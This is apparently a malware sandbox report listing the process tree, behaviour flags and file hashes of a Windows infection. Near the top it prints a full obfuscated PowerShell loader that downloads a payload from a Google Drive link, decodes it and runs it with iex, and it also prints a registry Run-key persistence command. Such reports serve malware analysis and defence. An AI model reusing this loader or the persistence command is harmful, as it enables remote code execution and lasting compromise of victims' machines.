- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4868 -
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Theis.Wee && echo t"3⤵PID:3836
-
-
C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Automanipulation='sramana';$Arsenyl=${host}.Runspace;If ($Arsenyl) {$Forhjulstrkket++;$Automanipulation+='Periosteum';$Miljreform='s';$Automanipulation+='Kostfri';$Miljreform+='ubst';$Automanipulation+='simarubaceous';$Miljreform+='ri';$Automanipulation+='Unindigenous';$Miljreform+='ng';};Function Diskpladsers76($Fimsenes){$Glycocholate51=$Fimsenes.Length-$Forhjulstrkket;For( $Agrin=1;$Agrin -lt $Glycocholate51;$Agrin+=2){$Callahan10+=$Fimsenes.$Miljreform.'Invoke'( $Agrin, $Forhjulstrkket);}$Callahan10;}function Albueben($Rundhaandedes){ . ($Forlbelsers) ($Rundhaandedes);}$Kontinuerliges193=Diskpladsers76 'KMboUzGiBl.lCa /P5 .M0s (,WGi,nsdCoswssM NATU F1 0R.P0 ;T .W i nF6F4L; RxC6 4 ;, Or v :U1 2 1c.O0 ) OGNe cAkTo /.2 0s1 0.0 1s0K1G DFci r,eBfBoixM/s1F2 1 . 0 ';$Eskortefartjernes=Diskpladsers76 ',UKs e rM-NA g,eCnBt ';$Bldgrers=Diskpladsers76 'ChOtstFp s : /T/.d.r.iPvTeK.EgMoKo gFlFe .AcEo,mp/Au,cJ?Ee xsp o r t =NdCo,wEnsl oPaIdP& iPd,=B1bC,7 HC1 t f U mCn _ajsU C F KDlFE.8asJ6UFsFL_,0 M Y,v Y n gA9 iH ';$Foresattes=Diskpladsers76 ',>. ';$Forlbelsers=Diskpladsers76 'Oi e xP ';$skandinavismens='Hrenes';$Konsignationen = Diskpladsers76 'DeNc hGo .%.a pFp dEa tFa.%.\KT hPeRiss..,W,e eP &,&U e.cFhFo, st, ';Albueben (Diskpladsers76 ' $ g.l okb a l.:ssAc.o u,r,sI=B( c m.d, /Oc .$ KCo,nFsDi g nma,tCi o nGeTnr)I ');Albueben (Diskpladsers76 '.$Pgsl,oTbVaslB: LPi qNu iRd,iEz eCd.6 6R=K$ BVlsdFg r e r s .Us p lEiPtM(.$ FZoFr.e,s ast t.eXs ). ');Albueben (Diskpladsers76 'R[sNTe t . sbe rNveiOcbe,P oIifnBt M a nTaEgAeCrU].:,: s etc uArRi t y P,rNo.tsoDc,oBlT T=. .[.N eDt,.Bsme cPu r iUt yRPDr ost.o,cEoNlPT y pCe ]s:D: T.l sF1E2, ');$Bldgrers=$Liquidized66[0];$sknnere= (Diskpladsers76 'G$Ug lDoTb.a,lF:FCTosp isnbgBs =FNUeBw.-VOYbUj,ePc.t Ps y s.t.eBm . N.eAt .TWCeFb C.l.iAeTn t');$sknnere+=$scours[1];Albueben ($sknnere);Albueben (Diskpladsers76 't$.Cso,p.i.n gBs...H,e,a.dseOrHsN[E$.EOs.kMoNr tCeIfEairHt jReArHn.ets ] = $.K,o n t i.n u e r.l i g e sC1 9 3U ');$Opt=Diskpladsers76 ' $ CIoIp.iDnBg.ss. D o w.n lOo aGd F iFl eB( $ BPlsdIg r.e,r.sD,,$CD iCePs,e.l i zTaBt iPo nEsO)F ';$Dieselizations=$scours[0];Albueben (Diskpladsers76 ' $Tg,l o b aTl,:,B o y efs =,(CTEessOtA-YP a tLh, P$TDHiLeTs,eEl iEz aNtPi o.nDsU)s ');while (!$Boyes) {Albueben (Diskpladsers76 'a$ g l oPb,asl : sOm i.t.aBbBl e,=P$at rVuKe ') ;Albueben $Opt;Albueben (Diskpladsers76 ' sPtUa,r,t.-fs lPesesps R4, ');Albueben (Diskpladsers76 ',$BgslRo,b aWl :,BLo yDeRs =M( TGe.sHtM-OP.aMtshP M$,DsireLs eFl i z.a t.iEo,nFs ) ') ;Albueben (Diskpladsers76 'I$ g l,o,b.aulT:EG r u nEd.sBk u d dPeVt,9,0s=.$FgRl oTb aslB:IL nCsPu.msmUe rL+B+C%A$ LDiAqsu i dPiBzPe dH6.6P. c oAuan,t. ') ;$Bldgrers=$Liquidized66[$Grundskuddet90];}$Rensningsforanstaltninger=311121;$Denaturerende=27562;Albueben (Diskpladsers76 ' $sgPlso,b a.l :bF o rAr.eGtKnPipn g.s gAr uFn dsl a g =W G.e tD-MCsoGnEtAeAn tR H$HD iOeMsLe,l,i zIaRtUi,o,n s. ');Albueben (Diskpladsers76 'A$.g lPo b a ls:NsBp eTc,i f.iTkUaTtsiso,n s m e t o dFiBkCsB .=, ,[ sfy sOtsePmH. C,o nPv eArCtA]d:C:AF,r oFmGBGa s eB6 4,s.t.rEiUnAg ( $GF osrsrPe.t nei n g sOg rAu nCdslmaHgE)M ');Albueben (Diskpladsers76 '.$ gsl o bVaTl :.GraFl a,nBe r b= k[ sAyUs,tIesmK.,T.e.xPta.IE.nsc oVd,iHn,g ],:s:KAFs C,I Ie. GTe,tFs,t.r,iPnDgD(,$Ks.p e c.i.f i ksaAt.iPo nss,mTe.t o d,i.k s )T ');Albueben (Diskpladsers76 'g$Fg l,oKb,aHl :.H a eUm.n i nTg.= $sG.aLl a,nEe r,.Ns u,b,sAtGr i,nLg.(s$HR e.n,s.n.i nRg,sRf o.r.a,n,s,tAa l t,nRi n,gse rb,s$ DWe nGa,t u rMe.rReDnsdCes)I ');Albueben $Haemning;"3⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2184 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Theis.Wee && echo t"4⤵PID:5880
-
-
C:\Program Files (x86)\windows mail\wab.exe"C:\Program Files (x86)\windows mail\wab.exe"4⤵
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3704 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Heliometry% -w 1 $Rrligst138=(Get-ItemProperty -Path 'HKCU:\Hyperaktuelles\').Midwintry;%Heliometry% ($Rrligst138)"5⤵
- Suspicious use of WriteProcessMemory
PID:3900 -
C:\Windows\SysWOW64\reg.exeREG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Heliometry% -w 1 $Rrligst138=(Get-ItemProperty -Path 'HKCU:\Hyperaktuelles\').Midwintry;%Heliometry% ($Rrligst138)"6⤵
- Adds Run key to start application
- Modifies registry key
PID:5196
-
-
-
C:\Windows\SysWOW64\svchost.exesvchost.exe5⤵
- System Location Discovery: System Language Discovery
PID:6096
-
-
C:\Windows\SysWOW64\svchost.exesvchost.exe5⤵
- System Location Discovery: System Language Discovery
- Modifies registry class
PID:5600
-
-
C:\Windows\SysWOW64\svchost.exesvchost.exe5⤵
- System Location Discovery: System Language Discovery
PID:2416
-
-
C:\Windows\SysWOW64\svchost.exesvchost.exe5⤵PID:5852
-
-
C:\Windows\SysWOW64\svchost.exesvchost.exe5⤵PID:4080
-
-
C:\Windows\SysWOW64\svchost.exesvchost.exe5⤵PID:3452
-
-
C:\Windows\SysWOW64\svchost.exesvchost.exe5⤵
- Modifies registry class
PID:352
-
-
C:\Windows\SysWOW64\svchost.exesvchost.exe5⤵
- System Location Discovery: System Language Discovery
- Modifies registry class
PID:4152
-
-
C:\Windows\SysWOW64\svchost.exesvchost.exe5⤵
- System Location Discovery: System Language Discovery
- Modifies registry class
PID:2276
-
-
C:\Windows\SysWOW64\svchost.exesvchost.exe5⤵
- Modifies registry class
PID:2252
-
-
C:\Windows\SysWOW64\svchost.exesvchost.exe5⤵
- Modifies registry class
PID:2344
-
-
C:\Windows\SysWOW64\svchost.exesvchost.exe5⤵
- System Location Discovery: System Language Discovery
PID:1644
-
-
C:\Windows\SysWOW64\svchost.exesvchost.exe5⤵
- Modifies registry class
PID:4212
-
-
C:\Windows\SysWOW64\svchost.exesvchost.exe5⤵
- Modifies registry class
PID:4988
-
-
C:\Windows\SysWOW64\svchost.exesvchost.exe5⤵
- Modifies registry class
PID:5440
-
-
C:\Windows\SysWOW64\svchost.exesvchost.exe5⤵
- System Location Discovery: System Language Discovery
- Modifies registry class
PID:5704
-
-
C:\Windows\SysWOW64\svchost.exesvchost.exe5⤵
- System Location Discovery: System Language Discovery
- Modifies registry class
PID:1072
-
-
C:\Windows\SysWOW64\svchost.exesvchost.exe5⤵PID:1032
-
-
C:\Windows\SysWOW64\svchost.exesvchost.exe5⤵
- System Location Discovery: System Language Discovery
PID:4000
-
-
C:\Windows\SysWOW64\svchost.exesvchost.exe5⤵
- System Location Discovery: System Language Discovery
- Modifies registry class
PID:4456
-
-
C:\Windows\SysWOW64\svchost.exesvchost.exe5⤵
- System Location Discovery: System Language Discovery
- Modifies registry class
PID:3172
-
-
C:\Windows\SysWOW64\svchost.exesvchost.exe5⤵PID:3168
-
-
C:\Windows\SysWOW64\svchost.exesvchost.exe5⤵
- System Location Discovery: System Language Discovery
PID:4396
-
-
C:\Windows\SysWOW64\svchost.exesvchost.exe5⤵
- Modifies registry class
PID:4264
-
-
C:\Windows\SysWOW64\svchost.exesvchost.exe5⤵
- Modifies registry class
PID:4688
-
-
C:\Windows\SysWOW64\svchost.exesvchost.exe5⤵PID:5060
-
-
C:\Windows\SysWOW64\svchost.exesvchost.exe5⤵PID:3272
-
-
C:\Windows\SysWOW64\svchost.exesvchost.exe5⤵
- System Location Discovery: System Language Discovery
PID:4316
-
-
C:\Windows\SysWOW64\svchost.exesvchost.exe5⤵
- System Location Discovery: System Language Discovery
- Modifies registry class
PID:4392
-
-
C:\Windows\SysWOW64\svchost.exesvchost.exe5⤵
- System Location Discovery: System Language Discovery
- Modifies registry class
PID:1220
-
-
C:\Windows\SysWOW64\svchost.exesvchost.exe5⤵
- System Location Discovery: System Language Discovery
- Modifies registry class
PID:6020
-
-
C:\Windows\SysWOW64\svchost.exesvchost.exe5⤵
- System Location Discovery: System Language Discovery
PID:1196
-
-
C:\Windows\SysWOW64\svchost.exesvchost.exe5⤵
- Modifies registry class
PID:3224
-
-
C:\Windows\SysWOW64\svchost.exesvchost.exe5⤵
- Modifies registry class
PID:5288
-
-
C:\Windows\SysWOW64\svchost.exesvchost.exe5⤵
- System Location Discovery: System Language Discovery
PID:1820
-
-
C:\Windows\SysWOW64\svchost.exesvchost.exe5⤵
- System Location Discovery: System Language Discovery
- Modifies registry class
PID:6060
-
-
C:\Windows\SysWOW64\svchost.exesvchost.exe5⤵
- System Location Discovery: System Language Discovery
PID:5676
-
-
C:\Windows\SysWOW64\svchost.exesvchost.exe5⤵PID:5236
-
-
C:\Windows\SysWOW64\svchost.exesvchost.exe5⤵
- System Location Discovery: System Language Discovery
PID:4840
-
-
C:\Windows\SysWOW64\svchost.exesvchost.exe5⤵PID:1504
-
-
C:\Windows\SysWOW64\svchost.exesvchost.exe5⤵
- Modifies registry class
PID:2944
-
-
C:\Windows\SysWOW64\svchost.exesvchost.exe5⤵
- System Location Discovery: System Language Discovery
- Modifies registry class
PID:400
-
-
C:\Windows\SysWOW64\svchost.exesvchost.exe5⤵
- Modifies registry class
PID:1760
-
-
C:\Windows\SysWOW64\svchost.exesvchost.exe5⤵
- System Location Discovery: System Language Discovery
PID:1676
-
-
C:\Windows\SysWOW64\svchost.exesvchost.exe5⤵
- Modifies registry class
PID:4348
-
-
C:\Windows\SysWOW64\svchost.exesvchost.exe5⤵
- System Location Discovery: System Language Discovery
PID:2568
-
-
C:\Windows\SysWOW64\svchost.exesvchost.exe5⤵
- System Location Discovery: System Language Discovery
PID:3156
-
-
C:\Windows\SysWOW64\svchost.exesvchost.exe5⤵
- Modifies registry class
PID:1988
-
-
C:\Windows\SysWOW64\svchost.exesvchost.exe5⤵
- System Location Discovery: System Language Discovery
PID:576
-
-
C:\Windows\SysWOW64\svchost.exesvchost.exe5⤵
- System Location Discovery: System Language Discovery
- Modifies registry class
PID:4884
-
-
C:\Windows\SysWOW64\svchost.exesvchost.exe5⤵
- Modifies registry class
PID:5216
-
-
C:\Windows\SysWOW64\svchost.exesvchost.exe5⤵
- System Location Discovery: System Language Discovery
PID:2232
-
-
C:\Windows\SysWOW64\svchost.exesvchost.exe5⤵
- Modifies registry class
PID:2928
-
-
C:\Windows\SysWOW64\svchost.exesvchost.exe5⤵
- Modifies registry class
PID:4548
-
-
C:\Windows\SysWOW64\svchost.exesvchost.exe5⤵
- System Location Discovery: System Language Discovery
- Modifies registry class
PID:5680
-
-
C:\Windows\SysWOW64\svchost.exesvchost.exe5⤵
- Modifies registry class
PID:6024
-
-
C:\Windows\SysWOW64\svchost.exesvchost.exe5⤵
- System Location Discovery: System Language Discovery
PID:1536
-
-
C:\Windows\SysWOW64\svchost.exesvchost.exe5⤵PID:5464
-
-
C:\Windows\SysWOW64\svchost.exesvchost.exe5⤵
- System Location Discovery: System Language Discovery
PID:2236
-
-
C:\Windows\SysWOW64\svchost.exesvchost.exe5⤵
- Modifies registry class
PID:4864
-
-
C:\Windows\SysWOW64\svchost.exesvchost.exe5⤵PID:876
-
-
C:\Windows\SysWOW64\svchost.exesvchost.exe5⤵PID:1512
-
-
C:\Windows\SysWOW64\svchost.exesvchost.exe5⤵
- Modifies registry class
PID:3756
-
-
C:\Windows\SysWOW64\svchost.exesvchost.exe5⤵
- System Location Discovery: System Language Discovery
PID:4164
-
-
C:\Windows\SysWOW64\svchost.exesvchost.exe5⤵PID:6108
-
-
C:\Windows\SysWOW64\svchost.exesvchost.exe5⤵PID:3612
-
-
C:\Windows\SysWOW64\svchost.exesvchost.exe5⤵
- System Location Discovery: System Language Discovery
PID:2268
-
-
C:\Windows\SysWOW64\svchost.exesvchost.exe5⤵
- System Location Discovery: System Language Discovery
PID:4388
-
-
C:\Windows\SysWOW64\svchost.exesvchost.exe5⤵PID:520
-
-
C:\Windows\SysWOW64\svchost.exesvchost.exe5⤵
- Modifies registry class
PID:4232
-
-
C:\Windows\SysWOW64\svchost.exesvchost.exe5⤵
- System Location Discovery: System Language Discovery
PID:6012
-
-
C:\Windows\SysWOW64\svchost.exesvchost.exe5⤵
- System Location Discovery: System Language Discovery
- Modifies registry class
PID:2812
-
-
C:\Windows\SysWOW64\svchost.exesvchost.exe5⤵
- System Location Discovery: System Language Discovery
- Modifies registry class
PID:2472
-
-
C:\Windows\SysWOW64\svchost.exesvchost.exe5⤵PID:1624
-
-
C:\Windows\SysWOW64\svchost.exesvchost.exe5⤵
- Modifies registry class
PID:5048
-
-
C:\Windows\SysWOW64\svchost.exesvchost.exe5⤵
- System Location Discovery: System Language Discovery
PID:4320
-
-
C:\Windows\SysWOW64\svchost.exesvchost.exe5⤵
- System Location Discovery: System Language Discovery
- Modifies registry class
PID:4324
-
-
C:\Windows\SysWOW64\svchost.exesvchost.exe5⤵
- System Location Discovery: System Language Discovery
PID:1152
-
-
C:\Windows\SysWOW64\svchost.exesvchost.exe5⤵
- System Location Discovery: System Language Discovery
- Modifies registry class
PID:1944
-
-
C:\Windows\SysWOW64\svchost.exesvchost.exe5⤵PID:2584
-
-
C:\Windows\SysWOW64\svchost.exesvchost.exe5⤵
- System Location Discovery: System Language Discovery
PID:4976
-
-
C:\Windows\SysWOW64\svchost.exesvchost.exe5⤵
- Modifies registry class
PID:2028
-
-
C:\Windows\SysWOW64\svchost.exesvchost.exe5⤵
- System Location Discovery: System Language Discovery
PID:4068
-
-
C:\Windows\SysWOW64\svchost.exesvchost.exe5⤵
- Modifies registry class
PID:4248
-
-
C:\Windows\SysWOW64\svchost.exesvchost.exe5⤵
- System Location Discovery: System Language Discovery
PID:1956
-
-
C:\Windows\SysWOW64\svchost.exesvchost.exe5⤵
- System Location Discovery: System Language Discovery
PID:4636
-
-
C:\Windows\SysWOW64\svchost.exesvchost.exe5⤵
- Modifies registry class
PID:5800
-
-
C:\Windows\SysWOW64\svchost.exesvchost.exe5⤵PID:2708
-
-
C:\Windows\SysWOW64\svchost.exesvchost.exe5⤵
- Modifies registry class
PID:2132
-
-
C:\Windows\SysWOW64\svchost.exesvchost.exe5⤵
- System Location Discovery: System Language Discovery
PID:3328
-
-
C:\Windows\SysWOW64\svchost.exesvchost.exe5⤵
- Modifies registry class
PID:5204
-
-
C:\Windows\SysWOW64\svchost.exesvchost.exe5⤵
- Modifies registry class
PID:2632
-
-
C:\Windows\SysWOW64\svchost.exesvchost.exe5⤵PID:4004
-
-
C:\Windows\SysWOW64\svchost.exesvchost.exe5⤵PID:4416
-
-
C:\Windows\SysWOW64\svchost.exesvchost.exe5⤵PID:2536
-
-
C:\Windows\SysWOW64\svchost.exesvchost.exe5⤵
- System Location Discovery: System Language Discovery
- Modifies registry class
PID:684
-
-
C:\Windows\SysWOW64\svchost.exesvchost.exe5⤵
- System Location Discovery: System Language Discovery
PID:4496
-
-
C:\Windows\SysWOW64\svchost.exesvchost.exe5⤵
- System Location Discovery: System Language Discovery
PID:2396
-
-
C:\Windows\SysWOW64\svchost.exesvchost.exe5⤵
- Modifies registry class
PID:3448
-
-
C:\Windows\SysWOW64\svchost.exesvchost.exe5⤵PID:4804
-
-
C:\Windows\SysWOW64\svchost.exesvchost.exe5⤵
- System Location Discovery: System Language Discovery
- Modifies registry class
PID:5640
-
-
C:\Windows\SysWOW64\svchost.exesvchost.exe5⤵PID:4772
-
-
C:\Windows\SysWOW64\svchost.exesvchost.exe5⤵PID:4576
-
-
C:\Windows\SysWOW64\svchost.exesvchost.exe5⤵
- Modifies registry class
PID:4704
-
-
C:\Windows\SysWOW64\svchost.exesvchost.exe5⤵PID:6052
-
-
C:\Windows\SysWOW64\svchost.exesvchost.exe5⤵PID:1028
-
-
C:\Windows\SysWOW64\svchost.exesvchost.exe5⤵
- System Location Discovery: System Language Discovery
PID:5392
-
-
C:\Windows\SysWOW64\svchost.exesvchost.exe5⤵
- System Location Discovery: System Language Discovery
- Modifies registry class
PID:1392
-
-
C:\Windows\SysWOW64\svchost.exesvchost.exe5⤵
- System Location Discovery: System Language Discovery
PID:2712
-
-
C:\Windows\SysWOW64\svchost.exesvchost.exe5⤵
- System Location Discovery: System Language Discovery
PID:4432
-
-
C:\Windows\SysWOW64\svchost.exesvchost.exe5⤵
- Modifies registry class
PID:2004
-
-
C:\Windows\SysWOW64\svchost.exesvchost.exe5⤵
- System Location Discovery: System Language Discovery
- Modifies registry class
PID:756
-
-
C:\Windows\SysWOW64\svchost.exesvchost.exe5⤵
- System Location Discovery: System Language Discovery
PID:5360
-
-
C:\Windows\SysWOW64\svchost.exesvchost.exe5⤵PID:5536
-
-
C:\Windows\SysWOW64\svchost.exesvchost.exe5⤵PID:5608
-
-
C:\Windows\SysWOW64\svchost.exesvchost.exe5⤵
- Modifies registry class
PID:5224
-
-
C:\Windows\SysWOW64\svchost.exesvchost.exe5⤵
- Modifies registry class
PID:5724
-
-
C:\Windows\SysWOW64\svchost.exesvchost.exe5⤵
- System Location Discovery: System Language Discovery
PID:4092
-
-
C:\Windows\SysWOW64\svchost.exesvchost.exe5⤵
- System Location Discovery: System Language Discovery
- Modifies registry class
PID:5788
-
-
C:\Windows\SysWOW64\svchost.exesvchost.exe5⤵
- Modifies registry class
PID:832
-
-
C:\Windows\SysWOW64\svchost.exesvchost.exe5⤵
- Modifies registry class
PID:2484
-
-
C:\Windows\SysWOW64\svchost.exesvchost.exe5⤵
- Modifies registry class
PID:2360
-
-
C:\Windows\SysWOW64\svchost.exesvchost.exe5⤵
- System Location Discovery: System Language Discovery
- Modifies registry class
PID:736
-
-
C:\Windows\SysWOW64\svchost.exesvchost.exe5⤵
- Modifies registry class
PID:3476
-
-
C:\Windows\SysWOW64\svchost.exesvchost.exe5⤵
- System Location Discovery: System Language Discovery
- Modifies registry class
PID:2464
-
-
C:\Windows\SysWOW64\svchost.exesvchost.exe5⤵PID:408
-
-
C:\Windows\SysWOW64\svchost.exesvchost.exe5⤵PID:3936
-
-
C:\Windows\SysWOW64\svchost.exesvchost.exe5⤵
- Modifies registry class
PID:1972
-
-
C:\Windows\SysWOW64\svchost.exesvchost.exe5⤵
- Modifies registry class
PID:5452
-
-
C:\Windows\SysWOW64\svchost.exesvchost.exe5⤵
- System Location Discovery: System Language Discovery
PID:764
-
-
C:\Windows\SysWOW64\svchost.exesvchost.exe5⤵
- System Location Discovery: System Language Discovery
PID:5744
-
-
C:\Windows\SysWOW64\svchost.exesvchost.exe5⤵
- System Location Discovery: System Language Discovery
PID:5256
-
-
-
-
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵PID:968
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
140B
MD57f97a5278e4858657257520f2e817ed4
SHA126a656173562a2bcc6e06a4ff634c14ce4bff4a4
SHA256cf215c0c17c0cba054c9a5a3357f8e8f114850e25927fd132078bf7aba3fe75b
SHA5121d76fd251dec87669c04d02f36b63fc00398079a08cdfe95f058b612609c0c0a873fab18f51e6159c3842091545b9fbeaa324aeb4a38c665824ccafb9d55c574
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
440KB
MD5101f0456c78a51dc6621f338fa0590e6
SHA1744017fe918a845dfc161516dab0f86579912507
SHA2563663b6fbf739bde311b85220fc41f266ec6f90cc6445c3ce77f3db94972aeac3
SHA512f56f372d17ee4843b3c68831d66549ccd9d72a4effebac7c53f4dda841d5454f4599f736db890f055604e2b179eab4c43836162567bdd1e63a598a807386a5f0